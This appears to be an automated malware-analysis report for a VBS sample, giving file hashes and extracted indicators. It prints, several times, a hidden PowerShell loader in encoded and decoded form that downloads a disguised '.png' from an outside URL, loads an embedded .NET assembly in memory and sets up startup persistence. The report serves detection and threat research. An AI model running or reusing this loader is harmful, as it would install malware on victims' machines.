|
Hash | Hash Value |
|---|---|
| MD5 | 1466a9747b904d9cdf7033ba37c430a5
|
| Sha1 | 47f5e8f3c8740972ebfc60ed1ec3386cc2d79639
|
| Sha256 | d50654478707bcd080e6f5097a82ca953f1271f18bda8c6a331bbbdeac43170b
|
| Sha384 | e80380c6d09ea739a303ee12fe2be16d1c8255874fe7bb1adf1859b5d1c841cc114f3c8ec1989ee1afc50ae15839f322
|
| Sha512 | c1fbde9d2cd58bcf15b2f01ef24968b3536d1862d41f26512863acae2ccd81c97ca633c4cd14a0e2423dd99c3a118b8a04bb2bb0896e10bc4d422aa1e85e0ea6
|
| SSDeep | 768:Tdtv/hoh62kAtM01lwzmzup78mJICfEK+QXuE5ztxaql7ynwvX:TdN2kAtH1azJOKICuQXD5ztxcnwvX
|
| TLSH | C37395B8B6EEF6D9A372AA4C2EBA07835AED4C02AF5D1C6D7C48143040D2C4745B677D
|
|
Name0 | Value |
|---|---|
| URLs in VB Code - #1 | http://www.ostrosoft.com/smtp.html |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgyMS9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnMGhIZHVVR2JwWkVabFJuY2xabmJ2TlVheVJHZTRoM2N6ZFhadTlDTjM0U091TXpOeDR5TndFekx2b0RjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHNcJywnTmFtZV9GaWxlJywnSW5zdGFsbFV0aWwnLCcnLCdJbnN0YWxsVXRpbCcsJycsJ1VSTCcsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHNcJywnTmFtZV9GaWxlJywndmJzJywnMScsJycsJ1Rhc2tfTmFtZScsJzAnLCdzdGFydHVwX29uc3RhcnQnKSk7')) | Invoke-Expression" |
| Deobfuscated PowerShell | Invoke-Expression |
| Deobfuscated PowerShell | Invoke-Expression |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "0hHduUGbpZEZlRnclZnbvNUayRGe4h3czdXZu9CN34SOuMzNx4yNwEzLvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads\", "Name_File", "InstallUtil", "", "InstallUtil", "", "URL", "C:\Users\Public\Downloads\", "Name_File", "vbs", "1", "", "Task_Name", "0", "startup_onstart") } )) |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "0hHduUGbpZEZlRnclZnbvNUayRGe4h3czdXZu9CN34SOuMzNx4yNwEzLvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads\", "Name_File", "InstallUtil", "", "InstallUtil", "", "URL", "C:\Users\Public\Downloads\", "Name_File", "vbs", "1", "", "Task_Name", "0", "startup_onstart") } )) |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgyMS9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnMGhIZHVVR2JwWkVabFJuY2xabmJ2TlVheVJHZTRoM2N6ZFhadTlDTjM0U091TXpOeDR5TndFekx2b0RjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHNcJywnTmFtZV9GaWxlJywnSW5zdGFsbFV0aWwnLCcnLCdJbnN0YWxsVXRpbCcsJycsJ1VSTCcsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHNcJywnTmFtZV9GaWxlJywndmJzJywnMScsJycsJ1Rhc2tfTmFtZScsJzAnLCdzdGFydHVwX29uc3RhcnQnKSk7')) | Invoke-Expression" |
| Deobfuscated PowerShell | Invoke-Expression |
|
Name0 | Value | Location |
|---|---|---|
| URLs in VB Code - #1 | http://www.ostrosoft.com/smtp.html |
1466a9747b904d9cdf7033ba37c430a5 |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgyMS9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnMGhIZHVVR2JwWkVabFJuY2xabmJ2TlVheVJHZTRoM2N6ZFhadTlDTjM0U091TXpOeDR5TndFekx2b0RjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHNcJywnTmFtZV9GaWxlJywnSW5zdGFsbFV0aWwnLCcnLCdJbnN0YWxsVXRpbCcsJycsJ1VSTCcsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHNcJywnTmFtZV9GaWxlJywndmJzJywnMScsJycsJ1Rhc2tfTmFtZScsJzAnLCdzdGFydHVwX29uc3RhcnQnKSk7')) | Invoke-Expression" Malicious |
1466a9747b904d9cdf7033ba37c430a5 > 1466a9747b904d9cdf7033ba37c430a5.deobfuscated.vbs > [Command #0] |
| Deobfuscated PowerShell | Invoke-Expression Malicious |
1466a9747b904d9cdf7033ba37c430a5 > 1466a9747b904d9cdf7033ba37c430a5.deobfuscated.vbs > [Command #0] > [PowerShell Command] |
| Deobfuscated PowerShell | Invoke-Expression Malicious |
1466a9747b904d9cdf7033ba37c430a5 > 1466a9747b904d9cdf7033ba37c430a5.deobfuscated.vbs > [Command #0] > [PowerShell Command] > [Deobfuscated PS] |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "0hHduUGbpZEZlRnclZnbvNUayRGe4h3czdXZu9CN34SOuMzNx4yNwEzLvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads\", "Name_File", "InstallUtil", "", "InstallUtil", "", "URL", "C:\Users\Public\Downloads\", "Name_File", "vbs", "1", "", "Task_Name", "0", "startup_onstart") } )) Malicious |
1466a9747b904d9cdf7033ba37c430a5 > 1466a9747b904d9cdf7033ba37c430a5.deobfuscated.vbs > [Command #0] > [Base64-Block] |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "0hHduUGbpZEZlRnclZnbvNUayRGe4h3czdXZu9CN34SOuMzNx4yNwEzLvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads\", "Name_File", "InstallUtil", "", "InstallUtil", "", "URL", "C:\Users\Public\Downloads\", "Name_File", "vbs", "1", "", "Task_Name", "0", "startup_onstart") } )) Malicious |
1466a9747b904d9cdf7033ba37c430a5 > 1466a9747b904d9cdf7033ba37c430a5.deobfuscated.vbs > [Command #0] > [Base64-Block] > [Deobfuscated PS] |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgyMS9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnMGhIZHVVR2JwWkVabFJuY2xabmJ2TlVheVJHZTRoM2N6ZFhadTlDTjM0U091TXpOeDR5TndFekx2b0RjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHNcJywnTmFtZV9GaWxlJywnSW5zdGFsbFV0aWwnLCcnLCdJbnN0YWxsVXRpbCcsJycsJ1VSTCcsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHNcJywnTmFtZV9GaWxlJywndmJzJywnMScsJycsJ1Rhc2tfTmFtZScsJzAnLCdzdGFydHVwX29uc3RhcnQnKSk7')) | Invoke-Expression" Malicious |
1466a9747b904d9cdf7033ba37c430a5 > 1466a9747b904d9cdf7033ba37c430a5.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] |
| Deobfuscated PowerShell | Invoke-Expression Malicious |
1466a9747b904d9cdf7033ba37c430a5 > 1466a9747b904d9cdf7033ba37c430a5.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] > [PowerShell Command] |